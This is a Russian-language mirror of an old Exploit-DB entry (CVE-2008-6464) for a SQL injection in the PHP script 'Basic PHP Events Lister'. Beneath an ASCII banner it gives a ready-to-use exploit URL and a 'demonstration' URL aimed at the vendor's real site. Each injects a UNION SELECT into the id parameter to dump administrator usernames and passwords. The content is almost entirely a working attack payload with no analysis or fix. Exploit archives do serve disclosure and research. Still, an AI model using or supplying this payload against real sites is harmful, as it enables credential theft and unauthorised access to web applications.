- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6508
- Проверка EDB
-
- Пройдено
- Автор
- 0X90
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6464
- Дата публикации
- 2008-09-21
Код:
_____ ____ _____
/ _ \ /\ /\ / _ \ / _ \
| | | | \ \/ / ||_| | | | | |
| | | | \ / \_ | | | | |
| |_| | / \ __\ | | |_| |
\_____/ / /\ \ |____/ \_____/
\/ \/
[~] Basic PHP Events Lister Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: Basic PHP Events Lister
[~] site: http://www.mevin.com
[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip
[~] Vulnerability Class: SQL Injection
[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
[~] Exploit:
http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
# milw0rm.com [2008-09-21]- Источник
- www.exploit-db.com
